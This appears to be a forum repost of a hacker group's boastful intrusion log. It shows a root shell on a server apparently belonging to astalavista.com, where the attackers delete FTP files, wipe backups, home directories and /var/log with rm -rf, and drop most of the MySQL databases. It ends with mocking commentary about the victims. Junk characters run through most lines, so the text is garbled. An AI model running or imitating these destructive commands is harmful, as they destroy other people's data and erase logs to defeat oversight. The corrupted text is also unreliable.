-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar$ t; }, t1 S. {, g
[snip]6 h& r, ?1 t) j1 n
226 Transfer complete.
6 c* l9 T9 M: D1 i" dftp> mdelete *2 l9 L( B9 Z- ~6 s
ftp> ls -la
: l' x: l6 T" f' Q) U5 M, q) w227 Entering Passive Mode (212,254,194,163,2,193)
' B/ [; M" Z: l+ q/ c150 Opening BINARY mode data connection for ‘file list’.2 k0 }9 c0 u, v) n- C/ \, d4 b7 m; B
226 Transfer complete.! S; _2 ?6 ^! U5 y3 S
ftp>
2 p3 l( v: m& s# h
; B! t! q0 \0 l" nsh-3.2# cd /home) i5 m+ D. r F" g
sh-3.2# ls -la X4 ]/ V* n) e! ]8 \$ h4 z
total 120
$ r5 W1 e2 K" g+ Bdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ./ }" @$ f c' } p- ?2 @
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
9 {9 [: `$ ~ J% m: Xdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
$ e9 [5 }! M) ^-rw——- 1 root root 8192 Jun 4 03:03 aquota.group8 h5 V* S/ z, k* m
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
6 k+ l* D5 h) {$ {' Sdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
$ i9 s# F$ I5 x! A2 W) L+ w* c0 Rdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup! ]. `& \1 ], P6 ?$ f; ]9 `
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
7 G& R/ p6 F c8 ]. J2 ydrwx–x–x 10 com com 4096 Apr 28 12:40 com
. B: o; t' J+ i+ s2 [drwxr-xr-x 2 root root 4096 May 17 2007 ftp
+ a; X. i! H# Hdrwx—— 3 jon jon 4096 Sep 21 2007 jon
& f' \% t; M5 G- c, sdrwx—— 2 root root 16384 Sep 11 2007 lost+found7 X( j( U# l6 \! M: o$ V5 j0 G
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
5 \0 q3 L' G/ t; cdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
& b( z" l( q1 \8 {: O8 e3 xdrwx—— 2 jon jon 4096 Sep 15 2007 test
" m5 A% h! K1 d" L9 h% V9 ~drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp# ~, j% h1 c+ H8 E* u- g$ c* m
4 O+ b( b) d/ L
sh-3.2# rm -rf backup/
- `9 Z) A& S. t) {$ Q& F/ U' csh-3.2# rm -rf backup.14161/
& k) B, m( K+ T1 c- E: nsh-3.2# rm -rf ftp/
" z$ z: u0 @! U3 K& ~- G- Ssh-3.2# rm -rf jon/
1 V3 I% w% s+ R/ d3 v$ Hsh-3.2# rm -rf my// _' j7 t _* K- l* N. l2 t* r
sh-3.2# rm -rf mysqldata/6 L" f# b/ `7 X/ o0 ~
sh-3.2# rm -rf test/7 h7 a8 O( p, b2 l
sh-3.2# rm -rf tmp/
# S* R- B" _( O' S0 Gsh-3.2# cd ~9 L2 H' e( M- a3 G$ `3 a
sh-3.2# rm -rf *. c5 [. ~* Z0 x" V/ s9 Q% g
sh-3.2# rm -rf /var/log/5 `/ u1 v4 |% n, p/ Y& A) k
rm: cannot remove directory `/var/log//proftpd’: Directory not empty' ?) \1 U! O! [. M$ T
sh-3.2# rm -rf /home/*
" q" d8 z) u4 D; ~3 Z" ?2 F' @sh-3.2# mysql
7 u! s" K) f5 Y; nWelcome to the MySQL monitor. Commands end with ; or \g.
; ?8 v( f' T% G9 f( cYour MySQL connection id is 407156
6 W9 T( e' P/ SServer version: 5.0.45-community-log MySQL Community Edition (GPL)1 J! F) f( M. \# [4 ~" l
* h3 M. c0 Q1 X4 v3 k* `
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
( |7 z7 U- q2 C4 R4 i+ p( i; M/ ~- b' R2 q
mysql> show databases;: a9 Y/ h T, Q6 o& K
+———————–+
( L2 Z, m+ r: |$ [ M: X, K+ {; @| Database |- m8 Y1 U3 Y' A" q
+———————–+8 I2 l. k; h9 j' Z/ e
| information_schema |1 C* Z$ u( ^( p1 k, J
| astanet_ads |
J3 t0 z1 V1 z1 f: K- v4 K| astanet_mailing_lists |
0 ^$ Y" ^5 r; b| astanet_mediawiki |! [1 ]( g( S) m0 _4 f5 L
| astanet_membersystem |
$ |7 y9 o7 E3 O; S% V' x4 M' T| com_contrexx |7 {9 r8 J. [( J. ?' h' R
| com_contrexx2 |
4 Z- w v) `; U! z9 k| com_contrexx2_live |$ q) g8 N/ Z/ Y5 t, m& G+ c
| da_roundcube |# y5 W8 Z; t; m' p% H3 k* D
| dolphin |
& U G" B; p3 Z* a| ideapool |
0 I6 p V+ R. B; a# M| mysql |. A* p0 @& c" G5 e8 ~$ {
| test |
L' q* Z8 s' u. f9 B: |& [| yourmaster |
: y* J) M0 }- X3 {+———————–+# e z9 o% i, w7 c% j% N5 b$ c
14 rows in set (0.03 sec)
7 Q" m" B2 Y* m% z2 t. h# v
8 |2 c$ }) N% G4 a2 n8 D, Zmysql> drop database astanet_membersystem;( s5 |: [8 M: g7 Z; e1 A
droQuery OK, 46 rows affected (0.81 sec)
& v: S5 |9 T2 ?+ `6 B7 k |; ?: p& C& q: ]: Z0 o
mysql> drop database com_contrexx;7 v* Y; Y& W: H2 j2 q3 |
Query OK, 211 rows affected (2.72 sec)
; L9 n/ F, A) x3 f: P% s' {' L- c" _: \! S" Q: S' c) i' x; w
mysql> drop database com_contrexx2;
7 [/ u0 a1 J% zQuery OK, 237 rows affected (2.23 sec). `" [, Q' N5 m
5 T7 Y1 {% ~" i! W' m3 R9 m2 Pmysql> drop database com_contrexx2_live;
5 g, v5 Z" u5 x$ g1 nQuery OK, 227 rows affected (7.63 sec)
M5 o' a, [/ K* H+ R' l" D: M! o" |
5 a! C: [, m/ R4 K. \: a" b; cmysql> drop database ideapool;
) }$ @" W* q+ z# O! _Query OK, 69 rows affected (0.19 sec)9 {) e) g! U! K. M$ k
. R* A4 N% c* l1 Q) w E8 [mysql> drop database yourmaster;
4 P7 a4 |; [- D( @Query OK, 158 rows affected (0.55 sec)& }) ]; m1 ^, c# z
7 P) E) _3 \! y4 ~. N5 u
mysql> drop database astanet_ads;
; d* L1 {5 M7 R: M4 MQuery OK, 9 rows affected (0.11 sec)+ F# V& I& L5 e( z; k& b
% Q. T/ z7 r0 L1 ^7 W
mysql> drop database astanet_mailing_lists;" c) e/ T {5 D" ]( \1 ~3 j- ?
Query OK, 24 rows affected (1.47 sec)$ _2 _, m1 |! s
) X7 C% D2 r3 r) @: tmysql> drop database astanet_mediawiki;
O1 m4 B4 t( b# HQuery OK, 31 rows affected (0.51 sec)4 j$ R" M( a. ~& M1 [
& s4 q6 O1 g' T
mysql> show databases;9 M$ H! `( h. `4 p7 A( N
+——————–+
4 ]8 a+ U7 C* F! e" ~! y, j| Database |
+ n V, y; u( o+ e+——————–+( D' y6 k8 }( S" N, N# T" _, P
| information_schema |4 \1 l. S6 {1 O, [% V
| da_roundcube |
1 v/ |% W; }0 f' s# H* Z| dolphin |7 e2 E4 k* E3 P. w
| mysql |) M6 l" v8 R6 W! x+ j
| test |
( E2 l' u5 R3 T" A6 }+——————–+
6 s" s+ `" O2 f2 ]- M# v0 Z& \$ A1 v3 u5 rows in set (0.00 sec)
0 ]* [4 E' X7 t( ]/ q/ Q N. s' N- F* @
What a journey! We’re not sure exactly why the “Terminator” had any influence on j/ u7 S+ J: x
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the2 e" J3 W( G' N2 } Z( n% e( A
wrong to say this pack of morons *wont be back*.! I& P7 Z' o" |) \. ]3 |
|
发表于 2012-11-6 21:07:34
收藏
支持
反对